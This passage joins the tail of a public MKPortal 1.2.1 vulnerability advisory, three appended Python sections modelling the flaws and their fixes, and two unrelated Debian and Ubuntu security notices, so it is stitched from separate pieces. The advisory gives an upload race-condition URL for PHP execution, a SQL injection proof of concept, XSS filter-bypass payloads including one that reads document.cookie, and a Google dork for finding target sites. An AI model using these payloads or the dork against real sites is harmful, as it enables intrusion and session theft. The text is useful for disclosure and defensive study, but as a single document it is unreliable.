 2. multiple tries needed for successful exploitation

Affected modules are Blog (gallery file upload), Reviews and Image Gallery.
For example let's look at Image Gallery's file upload code:

---------[source code]--------------------------
if (!$FILE_UPLOAD && $FILE_URL) {
//Copy file from remote server to gallery "tmp" directory
if (!copy("$file", "mkportal/modules/gallery/album/tmp/$file_name")) {
$message = "{$mklib->lang['ga_errorupl']}";
$mklib->error_page($message);
exit;
}
} else {
//Move file from local server tmp directory to gallery "tmp" directory
if (!move_uploaded_file("$file", "mkportal/modules/gallery/album/tmp/$file_name")) {
$message = "{$mklib->lang['ga_errorupl']}";
$mklib->error_page($message);
exit;
}
}
@chmod("mkportal/modules/gallery/album/tmp/$file_name", 0644);
..
//Validate by mime type
$tmpfilename = "mkportal/modules/gallery/album/tmp/$file_name";
$size = @getimagesize($tmpfilename);
//If getimagesize does not recognize file as an image delete file
if (!$size)  {
@unlink($tmpfilename);
$message .= "{$mklib->lang['ga_notsup']}";
$mklib->error_page($message);
exit;
}
---------[/source code]--------------------------

So there exists a timeframe where the temporary file is already moved to the "tmp"
directory, but it is not yet deleted. If the attacker manages to issue a request
like this

http://localhost/mkportal.1.2.1/mkportal/modules/Gallery/album/tmp/pic.php.pjpg

.. at the right time, then remote php code execution may be possible.
It is a classical race condition and the success probability of a single try is
very limited, but it's possible to make thousands of tries, until hitting
the jackpot. And by the way, "chmod(0644)" does not matter in this specific case :)


4. Sql Injection in Blog module template editing
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Security risk: medium
Preconditions:
 1. attacker must be registered user
 2. attacker must have blog editing privileges
 3. magic_quotes_gpc=off (rare in real-world servers)

Let's look at source code of "modules/blog/index.php" line ~1441:

---------------------[source code]---------------------
function save_template () {
global $mkportals, $DB, $Skin, $mklib;
..
$idb = $mkportals->member['id'];
$template = $_POST['template'];
$template = $this->clean_template($template);
$template2 = $_POST['template2'];
$template2 = $this->clean_template($template2);

$DB->query("UPDATE mkp_blog SET template = '$template',
 template2 = '$template2' WHERE id = '$idb'");
--------------------[/source code]---------------------

No "addslashes()" or "mysql_real_escape_string()" is used, so sql injection
is possible, if "magic_quotes_gpc" setting is "off".

Proof of concept:

a) Go to blog template editing interface:

http://localhost/mkportal.1.2.1/index.php?ind=blog&op=edit_template

b) Insert text into the "Home Template" textarea:

',template=@@version,template2='

.. and hit "Update Template". As a result the MySQL version is shown instead
of the blog content.



5. Reflected XSS in "handler_image.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Security risk: medium
Preconditions: none

Example:

http://localhost/mkportal.1.2.1/mkportal/modules/rss/handler_image.php?i=<script>alert(123);</script>


6. Stored XSS in blog templates
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Security risk: medium
Preconditions:
 1. attacker must be registered user
 2. attacker must have blog editing privileges

MKportal offers blog functionality to all registered users. Blog access and
creation is enabled by default. Quick search in Google reveals, that many
websites have enabled blog module.

Google dork: inurl:"index.php?ind=blog"

Any registered user with blog editing privileges can modify his own
blog templates. Templates are stored in database. Blog owner can manipulate
templates html source in arbitrary ways, but some security filtering is
in place, in order to prevent inserting potentially malicious content
(Javascript, VBScript, ...) into blog templates.

Let's look at source code of "modules/blog/index.php" line ~1441:

---------------------[source code]---------------------
function save_template () {
global $mkportals, $DB, $Skin, $mklib;
..
$idb = $mkportals->member['id'];
$template = $_POST['template'];
$template = $this->clean_template($template);
$template2 = $_POST['template2'];
$template2 = $this->clean_template($template2);

$DB->query("UPDATE mkp_blog SET template = '$template',
 template2 = '$template2' WHERE id = '$idb'");
--------------------[/source code]---------------------

So we can see, that security filtering is handled by function
"clean_template()". Let's look inside of this function:

---------------------[source code]---------------------
function clean_template ($t="") {
..
        while( preg_match( "#script(.+?)/script#ies", $t ) ) {
                $t = preg_replace( "#script(.+?)/script#ies", "" , $t);
        }
        $t = preg_replace( "/javascript/i", "", $t );
        //$t = preg_replace( "/about/i" , "", $t );
        $t = preg_replace( "/vbscript/i" , "", $t );
        $t = preg_replace( "/alert/i" , "", $t );
        $t = preg_replace( "/onmouseover/i", "", $t );
        $t = preg_replace( "/onclick/i" , "", $t );
        $t = preg_replace( "/onload/i" , "", $t );
        $t = preg_replace( "/onsubmit/i" , "", $t );

..
$t = preg_replace( "/ecmascript/i" , "", $t );
  $t = preg_replace( "/about:/si" , "", $t );
$t = preg_replace( "/data:/si" , "", $t );
$t = preg_replace( "/onfocus/i" , "", $t );
$t = preg_replace( "/onblur/i" , "", $t );
$t = preg_replace( "/ondblclick/i" , "", $t );
$t = preg_replace( "/onmousedown/i" , "", $t );
$t = preg_replace( "/onmouseup/i" , "", $t );
$t = preg_replace( "/onmousemove/i" , "", $t );
$t = preg_replace( "/onmouseout/i" , "", $t );
$t = preg_replace( "/onkeypress/i" , "", $t );
$t = preg_replace( "/onkeydown/i" , "", $t );
$t = preg_replace( "/onkeyup/i" , "", $t );
$t = preg_replace( "/onunload/i" , "", $t );
      $t = preg_replace( "/onabort/i" , "", $t );
      $t = preg_replace( "/onerror/i" , "", $t );
$t = preg_replace( "/onchange/i" , "", $t );
$t = preg_replace( "/onreset/i" , "", $t );
$t = preg_replace( "/onselect/i" , "", $t );
$t = preg_replace( "/document\./i" , "", $t );
$t = preg_replace( "/window\./i" , "", $t );

..
        return $t;
    }

--------------------[/source code]---------------------

This kind of filtering is an example of a flawed-by-design implementation.
If someone wants to insert javascript into a blog template, then it's still
possible! Here are some working examples:

<body ononsubmitload=aleonsubmitrt(123);>

<salertcript>aalertlert(123);</salertcript>


7. Stored XSS in Reviews module comments functionality
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Security risk: medium
Preconditions:
 1. attacker must be registered user
 2. attacker must have Reviews comments editing privileges

There are some security measures against script injection in comments
text, but still it's possible to sneak through those filters. Example:

<marquee loop=1 onfinish=alert(document.cookie) width=0></marquee>

This script will be executed, when someone opens review with this comment.
As result, cookie theft and other attacks may be possible. 


8. Stored XSS in News module comments functionality
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Security risk: medium
Preconditions:
 1. attacker must be registered user
 2. attacker must have news comments editing privileges

Same story, as in previous case - filtering exists, but can be bypassed.



9. Full path disclosure in "index.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Security risk: low
Preconditions: display_errors = Off

Example:

http://localhost/mkportal.1.2.1/?ind[]

Result:

Warning: Illegal offset type in isset or empty in 
C:\apache_wwwroot\mkportal.1.2.1\index.php on line 102


Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greets to ToXiC, y3dips, Sm0ke, Heintz, slimjim100, pexli, mge, str0ke,
to all active waraxe.us forum members and to anyone else who know me! 


Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe@yahoo.com
Janek Vind "waraxe"

Waraxe forum:  http://www.waraxe.us/forums.html
Personal homepage: http://www.janekvind.com/
---------------------------------- [ EOF ] ---------------------------------
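
Added example for items 1 to 3 of the advisory above (not MKPortal code; the function names, the magic-byte table and the staging/public directory split are assumptions): a Python model of the two published filename checks next to a stricter flow that validates before anything reaches a web-served directory and stores the file under a server-chosen name.

```python
import os
import re
import secrets
import tempfile

# Illustrative model; names below are not MKPortal identifiers.
ALLOWED_EXT = {"gif", "jpg", "png", "tif", "bmp"}  # list in upload_imm()
BAD_SUBEXT = ["com", "exe", "bat", "scr", "pif", "asp", "cgi", "pl", "php"]
# Leading bytes of the allowed image formats.
MAGIC = {b"\x89PNG\r\n\x1a\n": "png", b"\xff\xd8\xff": "jpg",
         b"GIF87a": "gif", b"GIF89a": "gif",
         b"II*\x00": "tif", b"MM\x00*": "tif", b"BM": "bmp"}


def gallery_check_as_published(file_name):
    """Model of upload_imm(): only the last three characters are compared."""
    return file_name[-3:].lower() in ALLOWED_EXT


def downloads_rename_as_published(file_name):
    """Model of add_file(): str_replace() is case-sensitive."""
    for bad in BAD_SUBEXT:
        file_name = file_name.replace("." + bad, "_" + bad)
    return file_name


def strict_extension(file_name):
    """Allowlisted extension of a name with exactly one dot, else None."""
    m = re.fullmatch(r"[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,4})", file_name)
    ext = m.group(1).lower() if m else None
    return ext if ext in ALLOWED_EXT else None


def sniff_image(data):
    """Extension implied by the file's leading bytes, else None."""
    for magic, ext in MAGIC.items():
        if data.startswith(magic):
            return ext
    return None


def publish_upload(data, client_name, staging_dir, public_dir):
    """Validate first, then publish atomically under a generated name.

    staging_dir must not be served by the web server and must be on the
    same filesystem as public_dir (os.replace requirement).
    """
    claimed = strict_extension(client_name)
    detected = sniff_image(data)
    if claimed is None or detected != claimed:
        raise ValueError("rejected upload")  # nothing was written anywhere
    fd, staged = tempfile.mkstemp(dir=staging_dir)
    try:
        with os.fdopen(fd, "wb") as fh:
            fh.write(data)
        os.chmod(staged, 0o644)
        # The client-supplied name is never used on disk, so the stored file
        # carries one extension only, chosen from the allowlist.
        final = os.path.join(public_dir, secrets.token_hex(16) + "." + detected)
        os.replace(staged, final)
        staged = None
        return final
    finally:
        if staged is not None and os.path.exists(staged):
            os.unlink(staged)


if __name__ == "__main__":
    for name in ("pic.php.jjpg", "foobar.agif", "test.Php.zzz", "holiday.JPG"):
        print(name, gallery_check_as_published(name),
              downloads_rename_as_published(name), strict_extension(name))
```

A valid image with embedded code still passes the content sniff, as the advisory notes for getimagesize(); what changes is that it can only be stored as <random>.<image extension> and never exists in a served directory before validation.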
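
Added example for item 4 of the advisory above (not MKPortal code): the string-built UPDATE from save_template() next to a bound-parameter version, run against an in-memory SQLite table. Assumptions: SQLite stands in for MySQL, so the constructed input uses sqlite_version() where the advisory's proof of concept uses @@version; the function names are illustrative.

```python
import sqlite3

# Constructed SQLite analogue of the advisory's proof-of-concept input.
PAYLOAD = "', template = sqlite_version(), template2 = '"


def open_db():
    """In-memory stand-in for the mkp_blog table (constructed sample row)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE mkp_blog ("
               "id INTEGER PRIMARY KEY, template TEXT, template2 TEXT)")
    db.execute("INSERT INTO mkp_blog VALUES (1, 'home', 'post')")
    return db


def save_template_as_published(db, idb, template, template2):
    """Same shape as save_template(): values pasted into the SQL text."""
    db.execute(
        "UPDATE mkp_blog SET template = '%s', template2 = '%s' "
        "WHERE id = '%s'" % (template, template2, idb)
    )


def save_template_bound(db, idb, template, template2):
    """Values travel as bound parameters and are never parsed as SQL."""
    db.execute(
        "UPDATE mkp_blog SET template = ?, template2 = ? WHERE id = ?",
        (template, template2, idb),
    )


def stored_template(db, idb):
    row = db.execute("SELECT template FROM mkp_blog WHERE id = ?", (idb,))
    return row.fetchone()[0]


if __name__ == "__main__":
    db = open_db()
    save_template_as_published(db, 1, PAYLOAD, "post")
    print("string-built:", stored_template(db, 1))  # the engine version

    db = open_db()
    save_template_bound(db, 1, PAYLOAD, "post")
    print("bound:       ", stored_template(db, 1))  # the literal input

    db = open_db()
    try:
        # Even a harmless apostrophe breaks the string-built statement.
        save_template_as_published(db, 1, "It's my blog", "post")
    except sqlite3.OperationalError as exc:
        print("benign input fails:", exc)
```

With bound parameters the result no longer depends on magic_quotes_gpc or on any escaping step in the application.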
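
Added example for item 6 of the advisory above (not MKPortal code): a Python model of the single-pass keyword stripping visible in the clean_template() excerpt, run over the advisory's two inputs to show which stripped keywords are present again in the output, next to plain output escaping. Assumptions: only the patterns visible in the excerpt are modelled (the parts elided with ".." are not), and the function names are illustrative.

```python
import html
import re

# Patterns visible in the advisory's excerpt of clean_template(), same order.
STRIPPED = [
    "javascript", "vbscript", "alert", "onmouseover", "onclick", "onload",
    "onsubmit", "ecmascript", "about:", "data:", "onfocus", "onblur",
    "ondblclick", "onmousedown", "onmouseup", "onmousemove", "onmouseout",
    "onkeypress", "onkeydown", "onkeyup", "onunload", "onabort", "onerror",
    "onchange", "onreset", "onselect", r"document\.", r"window\.",
]
SCRIPT_BLOCK = re.compile(r"script(.+?)/script", re.I | re.S)

# The two inputs given in the advisory.
SAMPLE_1 = "<body ononsubmitload=aleonsubmitrt(123);>"
SAMPLE_2 = "<salertcript>aalertlert(123);</salertcript>"


def clean_template_model(t):
    """Each pattern is removed once, in order; earlier ones are not rechecked."""
    while SCRIPT_BLOCK.search(t):
        t = SCRIPT_BLOCK.sub("", t)
    for pattern in STRIPPED:
        t = re.sub(pattern, "", t, flags=re.I)
    return t


def reformed_keywords(t):
    """Stripped patterns that are present again in the filter's output."""
    out = clean_template_model(t)
    found = [p for p in STRIPPED if re.search(p, out, re.I)]
    if SCRIPT_BLOCK.search(out):
        found.append("script-block")
    return found


def render_escaped(t):
    """Output encoding: the text is shown as text and never parsed as markup."""
    return html.escape(t, quote=True)


if __name__ == "__main__":
    for sample in (SAMPLE_1, SAMPLE_2):
        print("input   :", sample)
        print("filtered:", clean_template_model(sample))
        print("reformed:", reformed_keywords(sample))
        print("escaped :", render_escaped(sample))
```

Escaping is the baseline where the stored text does not need to be HTML; where templates must keep markup, the filter has to be an allowlist of elements and attributes applied to parsed HTML, since removing substrings always leaves an input whose remainder joins into a removed keyword.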

Date: Thu, 15 Jan 2009 22:00:47 +0100
From: Nico Golde <nion@debian.org>
To: bugtraq@securityfocus.com
Subject: [SECURITY] [DSA 1705-1] New netatalk packages fix arbitrary code execution

--------------------------------------------------------------------------
Debian Security Advisory DSA 1705-1                    security@debian.org
http://www.debian.org/security/                                 Nico Golde
January 15th, 2009                      http://www.debian.org/security/faq
--------------------------------------------------------------------------

Package        : netatalk
Vulnerability  : missing input sanitising
Problem type   : local(remote)
Debian-specific: no
CVE ID         : CVE-2008-5718
Debian Bug     : 510585

It was discovered that netatalk, an implementation of the AppleTalk
suite, is affected by a command injection vulnerability when processing
PostScript streams via papd.  This could lead to the execution of
arbitrary code.  Please note that this only affects installations that are
configured to use a pipe command in combination with wildcard symbols
substituted with values of the printed job.

For the stable distribution (etch) this problem has been fixed in
version 2.0.3-4+etch1.

For the upcoming stable distribution (lenny) this problem has been fixed
in version 2.0.3-11+lenny1.

For the unstable distribution (sid) this problem has been fixed in
version 2.0.4~beta2-1.

We recommend that you upgrade your netatalk package.


Upgrade Instructions
--------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given at the end of this advisory:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
-------------------------------

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

  These files will probably be moved into the stable distribution on
  its next update.

---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

Date: Thu, 15 Jan 2009 15:55:53 -0600
From: Jamie Strandboge <jamie@canonical.com>
To: ubuntu-security-announce@lists.ubuntu.com
Cc: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk
Subject: [USN-709-1] tar vulnerability

===========================================================
Ubuntu Security Notice USN-709-1           January 15, 2009
tar vulnerability
CVE-2007-4476
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 7.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  tar                             1.15.1-2ubuntu2.3

Ubuntu 7.10:
  tar                             1.18-2ubuntu1.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

Dmitry V. Levin discovered a buffer overflow in tar. If a user or automated
system were tricked into opening a specially crafted tar file, an attacker
could crash tar or possibly execute arbitrary code with the privileges of the
user invoking the program.

